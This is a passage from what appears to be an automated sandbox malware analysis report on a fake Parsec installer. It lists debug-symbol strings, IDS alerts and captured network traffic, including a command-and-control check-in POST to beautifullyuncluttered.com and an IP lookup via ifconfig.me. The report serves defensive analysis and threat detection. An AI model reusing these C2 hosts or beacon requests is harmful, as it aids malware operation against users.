Source: Binary string: SystemEventsBrokerClient.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: RdpSaUacHelper.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: SocialApis.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: SyncInfrastructurePS.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: NetworkHelper.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\gitsrc\parsec-cloud\magic-mirror\driver\x64\Release\mm.pdb source: nefconw.exe, 00000049.00000003.2474352730.000002868CACB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: verifier.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\gitsrc\parsec-cloud\usb-ip\parsecvirtualds\src\x64\Release\parsecvirtualds.pdb source: nefconw.exe, 00000038.00000002.2444060898.000001AFE1992000.00000004.00000020.00020000.00000000.sdmp, nefconw.exe, 00000038.00000003.2443146793.000001AFE1992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: MFWMAAEC.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dskquoui.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sscore.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: netlogon.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: SocialApis.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: NetworkHelper.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: icuin.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: MCRecvSrc.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: SyncInfrastructurePS.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: MCRecvSrc.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: WSClient.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wiashext.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: lockappbroker.pdbUGP source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wkbda3.pdb source: uu8v4UUzTU.tmp, 00000002.00000002.2291864507.000000000018C000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: MFWMAAEC.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Windows.ApplicationModel.ConversationalAgent.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wkbdibm02.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wkbdarmty.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dskquoui.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wups.pdbUGP source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\gitsrc\parsec-cloud\usb-ip\pcvudhc\x64\Release\parsecvusba.pdb source: drvinst.exe, 00000036.00000003.2374772071.000002849F521000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: SystemEventsBrokerClient.pdbUGP source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dmcfgutils.pdbUGP source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: lockappbroker.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Windows.UI.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dmcfgutils.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: verifier.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: netlogon.pdbUGP source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wiashext.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TpmTool.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sscore.pdbUGP source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: xpsservices.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Windows.UI.pdbUGP source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cryptdlg.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wlanext.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00F78318 FindFirstFileW,FindFirstFileW,free,6_2_00F78318
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeCode function: 13_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,13_2_00405C49
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeCode function: 13_2_00406873 FindFirstFileW,FindClose,13_2_00406873
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeCode function: 13_2_0040290B FindFirstFileW,13_2_0040290B
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD04A89C FindFirstFileExW,39_2_00007FF7CD04A89C
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeCode function: 45_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,45_2_00405C49
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeCode function: 45_2_00406873 FindFirstFileW,FindClose,45_2_00406873
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeCode function: 45_2_0040290B FindFirstFileW,45_2_0040290B
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C348EE4 FindFirstFileExW,48_2_00007FF72C348EE4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AD85E4 FindFirstFileExW,51_2_00007FF7E5AD85E4
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeCode function: 65_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,65_2_00405C49
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeCode function: 65_2_00406873 FindFirstFileW,FindClose,65_2_00406873
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeCode function: 65_2_0040290B FindFirstFileW,65_2_0040290B
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF6181985E4 FindFirstFileExW,71_2_00007FF6181985E4
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00F79414 free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,6_2_00F79414

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2051091 - Severity 1 - ET MALWARE Unknown Malvertising Payload CnC Checkin (PSecWin) : 192.168.2.5:49708 -> 188.114.96.3:443
Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox ViewIP Address: 34.160.111.145 34.160.111.145
Source: Joe Sandbox ViewIP Address: 34.160.111.145 34.160.111.145
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknownDNS query: name: ifconfig.me
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 34.160.111.145:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49940 -> 104.18.0.181:443
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49709
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.5:49912
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ifconfig.me
Source: global trafficHTTP traffic detected: POST /?CheckApp HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 158Host: beautifullyuncluttered.com
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ifconfig.me
Source: global trafficDNS traffic detected: DNS query: ifconfig.me
Source: global trafficDNS traffic detected: DNS query: beautifullyuncluttered.com
Source: unknownHTTP traffic detected: POST /?CheckApp HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 158Host: beautifullyuncluttered.com
Source: parsec-windows.exe, 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F01129F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B40000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B0F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B0F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2617887892.000001F011B50000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286297733.000001F0111F5000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287538963.000001F011AFA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137228223.000001F011B60000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2618233200.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F011270000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: pservice.exe, 00000027.00000003.2531231225.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287503438.000001F011AEF000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537010055.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3138656543.000001F011AEF000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537131193.000001F011AEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
Source: parsec-windows.exe, 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F01129F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B40000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2617887892.000001F011B50000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137674102.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137228223.000001F011B60000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: pservice.exe, 00000027.00000003.2531231225.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287503438.000001F011AEF000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537010055.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3138656543.000001F011AEF000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537131193.000001F011AEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crtKK
Source: parsec-windows.exe, 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F01129F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B40000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B0F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2617887892.000001F011B50000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286297733.000001F0111F5000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137674102.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137228223.000001F011B60000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2618233200.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: parsec-windows.exe, 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F01129F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B40000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B0F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2617887892.000001F011B50000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286297733.000001F0111F5000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137674102.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3138247513.000001F0112F6000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3138282207.000001F0112FD000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137228223.000001F011B60000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2618233200.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: pservice.exe, 00000027.00000003.2531231225.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287503438.000001F011AEF000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537010055.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3138656543.000001F011AEF000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537131193.000001F011AEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/
Source: pservice.exe, 00000027.00000003.2531443435.000001F0112D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/4g
Source: pservice.exe, 00000027.00000003.3137674102.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
Source: parsec-windows.exe, 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F01129F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B40000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B0F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B0F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2617887892.000001F011B50000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286297733.000001F0111F5000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287538963.000001F011AFA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137228223.000001F011B60000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2618233200.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F011270000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: pservice.exe, 00000027.00000003.3138463049.000001F0112E3000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F0112C2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531231225.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287286552.000001F0112FE000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3138247513.000001F0112F6000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537010055.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531406559.000001F0112F5000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287212937.000001F0112E8000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3138282207.000001F0112FD000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F0112C2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531443435.000001F0112D9000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137674102.000001F0112C2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137674102.000001F0112D9000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537131193.000001F011AEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
Source: pservice.exe, 00000027.00000003.2496352326.000001F01129F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B40000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2617887892.000001F011B50000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137674102.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137228223.000001F011B60000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: pservice.exe, 00000027.00000003.2531231225.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537010055.000001F011AEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537131193.000001F011AEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlBy
Source: pservice.exe, 00000027.00000003.3137674102.000001F0112B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlhttp://crl4.digicert.co
Source: parsec-windows.exe, 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000027.00000003.2496352326.000001F01129F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2515315073.000001F011B40000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2617887892.000001F011B50000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287612130.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B1E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286297733.000001F0111F5000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137674102.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137228223.000001F011B60000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137363925.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F011259000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F01125C000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2618233200.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002D.00000002.2448675906.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: parsec-vud.exe, 0000002D.00000002.2448675906.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000041.00000002.2491857385.000000000040A000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: pservice.exe, 00000027.00000003.3137674102.000001F0112C8000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F0112C8000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531443435.000001F0112D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com:80/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlche
Source: pservice.exe, 00000027.00000003.2536923154.000001F011B07000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2536642838.000001F011B06000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2537335185.000001F011B07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096
Source: pservice.exe, 00000027.00000003.2537131193.000001F011AEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
